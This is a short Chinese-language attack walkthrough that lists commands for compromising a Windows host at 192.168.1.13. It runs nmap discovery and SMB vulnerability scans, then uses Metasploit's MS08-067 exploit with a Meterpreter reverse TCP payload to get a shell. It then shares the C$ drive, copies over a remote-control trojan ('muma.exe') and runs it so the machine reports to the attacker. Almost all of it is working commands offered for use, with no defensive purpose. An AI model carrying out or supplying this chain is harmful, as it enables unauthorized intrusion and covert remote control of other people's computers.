1.nmap -sP  192.168.1.* |grep for 查看存活主机

2.选择目标主机 192.168.1.13

3.扫描常见的服务  nmap 192.168.1.13

4.扫描目标的操作系统类型 nmap -O 192.168.1.13 

5.查看各个服务的版本信息 nmap -sV 192.168.1.13


6.扫描目标服务可能存在的漏洞 
nmap  -script=smb-check-vulns.nse

7.利用可能存在的漏洞(例如MS08_067)溢出
nmap -sS -sV -O -script=smb-check-vulns.nse 192.168.1.13

8.进入MSF目录
cd /pentest/expliots/framework2c /

9.启动MSF
./msfconsole

10.查看漏洞script脚本 search MS08_067

11.选择script脚本  use exploit/windows/smb/MS08067_netapi

12 设置payload方式 set payload windows/meterpreter/reverse_tcp

13.查看选项 show options

14.溢出设置 

set RHOST 目标ip

set LHOST 自己ip   还可以 show targets 查看可攻击的目标

15. 溢出攻击目标 exploit

16. 查看会话 sessions -l
 
17. 连接会话 session -i 1
 
18. sysinfo 查看系统信息  shell 进入cmdshell

19. MS溢出得到cmdshell   

20. 配置远控  之后溢出cmdshell里执行

21. net share C$    把C盘共享出来

22. 自己cmd下   \\192.168.1.13\c$ 打开共享  复制自己的小马过去

22. 溢出cmdshell里面进入C盘 cd c:\

23. 运行muma.exe远控小马   目标上线。

24. 记住也可以用msfweb方式进行设置  http://127.0.0.1:5555/